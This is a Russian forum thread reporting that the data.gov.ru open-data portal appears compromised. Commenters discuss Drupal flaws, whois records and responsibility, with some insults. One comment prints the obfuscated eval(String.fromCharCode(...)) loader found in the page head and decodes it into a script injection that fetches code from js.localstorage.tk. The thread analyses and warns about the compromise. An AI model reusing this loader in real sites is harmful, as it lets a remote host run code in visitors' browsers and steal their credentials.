Пофигизм - наш ответ хакерам: Взломано ядро портала открытых данных России

Аватар пользователя mentat

Пока янки негодуют и трясутся над своими информационными ресурсами, наши власти просто положили болт на безопасность. Отличный ассимитричный ответ на взломы наших систем.

Несколько дней назад в комментариях я дал комрадам ссылку на наши "открытые данные" http://data.gov.ru/  (а конкретно на http://data.gov.ru/taxonomy/term/71/datasets )
Каково же было мое удивление, когда браузер Хром выдал, что это фишинговая страница. Я проверил - действительно в заголовке страницы скрыто подключается скрипт со стороннего сайта https://js.localstorage.tk
Впринципе в этом нет ничего удивительного - сайт сделан на Drupal, который известен своей бесплатной дырявостью.
Стало интересно - когда же закроют эту уязвимость. Гугл обычно присылает предупреждения веб-мастерам, если на их страницах завелась нечисть. Прошло уже несколько дней, но ничего не поменялось. Сайт все также заражен, и вообщем то всем пофиг. Еще раз - сайт data.gov.ru - официальный правительственный домен.

Внимание - не осуществляйте авторизацию на этом сайте - ваши учетные данные могут утечь к злоумышленникам.

Ну и напоследок ложка меда - сайт js.localstorage.tk не пингуется. Но при этом не разделегирован 

p# whois localstorage.tk

   Domain name:
      LOCALSTORAGE.TK

   Organisation:
      Freedom Registry, Inc.
      2225 East Bayshore Road #290
      Palo Alto CA 94303
      United States
      Phone: +1 650-681-4172
      Fax: +1 650-681-4173

   Domain Nameservers:
      NS01.FREENOM.COM
      NS02.FREENOM.COM
      NS03.FREENOM.COM
      NS04.FREENOM.COM

И почему наши политики не кричат что американцы highly likely взломали наш правительственный сервер? За друпал было бы конечно стыдно, но какой повод ...
Ну и делаем ставки, когда наши таки полечат сайт.

Авторство: 
Авторская работа / переводика

Комментарии

Аватар пользователя alexsword
alexsword(14 лет 3 месяца)

> сайт сделан на Drupal, который известен своей бесплатной дырявостью.

У нас тоже в основе движка Друпал, но вроде не ломали ни разу.

Куча серьезных сайтов на этой архитектуре сделано.

Возможно тут дело не в системе, а в человеческом факторе.  Админ накосячил, или намеренно (при увольнении, например) нагадил. 

Аватар пользователя salemem
salemem(12 лет 8 месяцев)

Хабровский скриптокиди безопасность проверяет хромом, о чем вообще тут говорить? Почему это на главной. Он к примеру даже не знает о том, что у буша и обамы сайты тоже на друпал были, и что-то никто не смог поломать. Даже думаю имя этого "админа" не обиженного, а опущенного вернее говорить, известно: mentat

Комментарий администрации:  
*** Ахтунг! Живая оранжевая крыса ***
Аватар пользователя alexsword
alexsword(14 лет 3 месяца)

Высеры про Друпал, конечно, невежество, но сама новость забавна - ведь это точка входа на портал открытых данных.

Аватар пользователя salemem
salemem(12 лет 8 месяцев)

Прикол в реальности в том, что это всего-лишь подозрение гугля на фишинг. Но счастья у школьнка - полные штаны.

Комментарий администрации:  
*** Ахтунг! Живая оранжевая крыса ***
Аватар пользователя alexsword
alexsword(14 лет 3 месяца)

Выглядит и впрямь предельно подозрительно - российскому ресурсу зачем на мутный штатовский сайт из черных списков данные засылать?

Аватар пользователя rukav
rukav(9 лет 7 месяцев)

gov.ru домен принадлежит ФСО России. Соответственно это в их компетенции контролировать безопасность всех своих поддоменных (data.gov.ru) ресурсов.

Автору бы написать им письмо и обратить на это внимание.

 

 

Аватар пользователя mentat
mentat(14 лет 1 месяц)

У нас конечно не Будапешт, но от общения с этими ребятами я воздержусь

Аватар пользователя Bruno
Bruno(10 лет 5 месяцев)

Вот жеж блин! Как всё-таки различается культура по отношению к безопасности в мире! На Западе денежные призы дают за взлом алгоритмов шифрования, понимая, что любая система рано или поздно может стать уязвимой и гораздо лучше узнать об этом как можно раньше, пока этим не надумали воспользоваться какие-нибудь злоумышленники. Хотя они и не сразу к этому пришли, но всё-таки пришли. А на Востоке (Будапешт - всё-таки Восточная Цэуропа) пока ещё придерживаются средневековых методов устрашения.

Аватар пользователя kw
kw(11 лет 7 месяцев)

Как всё-таки различается культура по отношению к безопасности в мире! На Западе денежные призы дают за взлом алгоритмов шифрования, понимая, что любая система рано или поздно может стать уязвимой и гораздо лучше узнать об этом как можно раньше

Это вы про грязных русских хакеров?

Аватар пользователя Bruno
Bruno(10 лет 5 месяцев)

Нет. Про RSA Factoring Chalenge. Правда, именно эти соревнования уже 10 лет не проводятся - по той причине, что рост производительности компьютеров затормозился и взлом методом грубой силы сейчас не актуален. Но уверен, что с появлением каких-нибудь квантовых компьютеров движуха там снова возобновится. Но есть и другие менее известные конкурсы, исключающие методы грубой силы.

Тем не менее, этого достаточно для иллюстрации различий самих подходов к безопасности. А у нас бы Яровая их всех из пулемёта расстреляла.

Аватар пользователя calvares
calvares(11 лет 1 месяц)

Есть разница. Там парень продемонстрировал своими действиями, потому ему инкриминировали.

Тут стандартные предупреждения браузера без изменения даже кода страницы.

Аватар пользователя parrit
parrit(12 лет 9 месяцев)

Технической поддержкой занимается вот эта мутная контора.

% By submitting a query to RIPN's Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian) 
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain:        OPENDATASUPPORT.RU
nserver:       dns1.yandex.net.
nserver:       dns2.yandex.net.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     RU-CENTER-RU
admin-contact: https://www.nic.ru/whois
created:       2017-10-10T10:18:37Z
paid-till:     2018-10-10T10:18:37Z
free-date:     2018-11-10
source:        TCI

Last updated on 2018-05-24T10:51:33Z

 

Аватар пользователя rukav
rukav(9 лет 7 месяцев)

Контора? Скорей всего шарашкина контора laugh

Публично за opendatasupport.ru скрывается некая "Служба поддержки Портала открытых данных РФ":

телефон: 8-495-220-65-68 (с 10:00 до 19:00 МСК)

e-mail: support@opendatasupport.ru

Но вот сам opendatasupport.ru домен зарегистрирован на некое частное лицо.

Еще раз, частное лицо! И видимо, служба поддержки осуществляется этим самым мутным прикормленным лицом из министерства экономики laugh

Аватар пользователя parrit
parrit(12 лет 9 месяцев)

Таки да. Согласен.

 

Аватар пользователя mentat
mentat(14 лет 1 месяц)

Дауненок, ты считаешь новость про то что правительственный сайт взломали и это никто не фиксит - ерундой? :) Иди прогуляйся
Для дауненка еще раз - я не проводил аудит безопасности сайта, я это заметил просто попытавшись зайти на сайт.

Аватар пользователя mentat
mentat(14 лет 1 месяц)

Если обновлять почаще, то рисков меньше

Аватар пользователя И-23
И-23(10 лет 4 месяца)

Какая прелесть.
Тихой сапой продвигается мысль о проприетарной не-дырявости.
Автору статьи не помешало бы изучить соответствующие профили IIS'а.

Аватар пользователя e.tvorogov
e.tvorogov(10 лет 3 дня)

Шапкозакидателям не стыдно от таких новостей.

Аватар пользователя DeimonAx
DeimonAx(9 лет 7 месяцев)

сайт js.localstorage.tk не пингуется.

Если у него пинги отключены, зачем ему пинговаться? А вот, что он не резолвится - это хорошо.

Аватар пользователя rukav
rukav(9 лет 7 месяцев)

Кстати, вот он офис этой Freedom Registry, Inc. канторы по ул. 2225 East Bayshore Road

Рядом растут берёзки laugh

Аватар пользователя Weard
Weard(8 лет 2 месяца)

Рядом растут берёзки

Ну, вот оно чё..

Комментарий администрации:  
*** Отключен (лидер бан-рейтинга, провокатор) ***
Аватар пользователя shumod
shumod(10 лет 4 месяца)

> Впринципе в этом нет ничего удивительного - сайт сделан на Drupal, который известен своей бесплатной дырявостью.

Недавно в ядре была обнаружена уязвимость. Сайт просто не обновили, чтобы закрыть её. По каким причинам - большой вопрос.

Такие уязвимости в друпале обнариживаются значительно реже, чем в джумле или вордпрессе.

 

> Внимание - не осуществляйте авторизацию на этом сайте - ваши учетные данные могут утечь к злоумышленникам.

В целом эта уязвимость даёт злоумышленнику полный доступ к управлению сайтом. Поэтому все данные уже утекли, если они были в базе данных.

Аватар пользователя rukav
rukav(9 лет 7 месяцев)

Что касается "localstorage.tk", то его многие ругают как подхваченную заразу. См. форум. А также похожие симптомы.

Аватар пользователя Rashad_rus
Rashad_rus(13 лет 11 месяцев)

Откройте исходники страниц сайта - ни чего подобного там нет. Уж очень маловероятно, что гугль САМ занимается фишингом, чтобы воровать Ваши данные или, скорее - кто-то ходит через проксю, которая искажает запрашиваемый контент или словил виря.)))))))

Аватар пользователя mentat
mentat(14 лет 1 месяц)

Там оно в скрытом виде:

<head><script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 122, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 59, 32, 122, 46, 116, 121, 112, 101, 32, 61, 32, 34, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 59, 32, 122, 46, 115, 114, 99, 32, 61, 32, 34, 104, 116, 116, 112, 115, 58, 47, 47, 106, 115, 46, 108, 111, 99, 97, 108, 115, 116, 111, 114, 97, 103, 101, 46, 116, 107, 47, 115, 46, 106, 115, 63, 109, 111, 114, 61, 50, 51, 34, 59, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 104, 101, 97, 100, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 122, 41, 59));</script>

Это развертывается в
"var z = document.createElement("script"); z.type = "text/javascript"; z.src = "https://js.localstorage.tk/s.js?mor=23"; document.head.appendChild(z);
<
Аватар пользователя nictrace
nictrace(13 лет 11 месяцев)

обфусцированный js, ага

Аватар пользователя Rashad_rus
Rashad_rus(13 лет 11 месяцев)

Да... верно подметили. Это уже повод для разбора. Серьезного разбора полетов. Если в течении недели не уберут - кого-то снимут с должности... обещаю!

Аватар пользователя nictrace
nictrace(13 лет 11 месяцев)

сайт открывается, обращение к турчанскому скрипту действительно есть, но он не загружается, поскольку домен не имеет ssl-сертификата. Если владалец турчанского домена завтра поставит нормальный сертификат - одному Аллаху ведомо, что будет грузиться вместе с порталом wink

Аватар пользователя Podvalny
Podvalny(11 лет 9 месяцев)

только .TK - это не Турция, а Токелау smiley

Аватар пользователя nictrace
nictrace(13 лет 11 месяцев)

ну тем более) "островные" зоны чаще всего используются мошенниками...

Аватар пользователя rukav
rukav(9 лет 7 месяцев)

сайт открывается, обращение к турчанскому скрипту действительно есть, но он не загружается, поскольку домен не имеет ssl-сертификата

Немного не в этом суть. Домен занят "localstorage.tk", только вот за ним сервера нет. Возможно сервер активизируют в определенное время и только после этого запросы начнут исполнятся.

Аватар пользователя nictrace
nictrace(13 лет 11 месяцев)

точняк, DNS не прописали...

Аватар пользователя shaastra
shaastra(13 лет 11 месяцев)

Этот проект (data.gov.ru) видимо заброшен где-то с конца 17-го года (судя по ассоциированным с проектом форумом, соцсетями).
Сайт даже и не взломан, а просто заражен ботом, который обходил все drupal-сайты с незакрытой уязвимостью и заражал их.
Интересно, почему забросили проект

Аватар пользователя promedol
promedol(9 лет 11 месяцев)

сайт сделан на Drupal, который известен своей бесплатной дырявостью.

Drupal не более и не менее дырявый, чем любая другая cms. Бесплатность тут вообще-то не при чём. Да и ломают в 90% случаев не сам друпал, разработчики ядра там внимательно относятся к безопасности. Проблема - разнообразные модули, написанные жопой.

Комментарий администрации:  
*** Готовит кляузу в прокуратуру на наших авторов и АШ в целом - https://aftershock.news/?q=comment/11170411#comment-11170411 ***
Аватар пользователя Despinator
Despinator(8 лет 10 месяцев)

Вот поэтому всё, что нужно, забираю оттуда не браузером, а самописным скриптом с перепроверками.

Скрытый комментарий Повелитель Ботов (без обсуждения)
Аватар пользователя Повелитель Ботов

Перспективный чат детектед! Сим повелеваю - внести запись в реестр самых обсуждаемых за последние 4 часа.

Комментарий администрации:  
*** Это легальный, годный бот ***
Аватар пользователя mkizub
mkizub(10 лет 6 месяцев)

Взломано ядро портала открытых данных России

А в чём проблема? Это же портал открытых данных!!!

Комментарий администрации:  
*** Отключен (клевета) ***
Аватар пользователя TPAKTOP
TPAKTOP(14 лет 3 недели)

в том, что могут быть скомпрометированы данные всех пользователей этого портала. подсунуть можно что угодно, от майнера до фишинга.

Комментарий администрации:  
*** Уличен в сомнительных утверждениях и манипуляциях, считает что вправе говорить от лица "народных масс" ***
Аватар пользователя mkizub
mkizub(10 лет 6 месяцев)

Их и так можно скомпроментировать. Разместить в фейсбуке объявление, что такой-то - редиска. И все западные СМИ подхватят эту чудовищную ложь, оправдывая бомбардировку молодой Аравийской Народной Республики.

Комментарий администрации:  
*** Отключен (клевета) ***
Аватар пользователя TPAKTOP
TPAKTOP(14 лет 3 недели)

Я говорил о технической компрометации, т.е. получении доступа к пользовательским данным и ресурсам. А вы про что-то совсем другое.

Комментарий администрации:  
*** Уличен в сомнительных утверждениях и манипуляциях, считает что вправе говорить от лица "народных масс" ***
Аватар пользователя mkizub
mkizub(10 лет 6 месяцев)

Я про то, что изначально и тема смешная, и пост мой был шуткой.

Комментарий администрации:  
*** Отключен (клевета) ***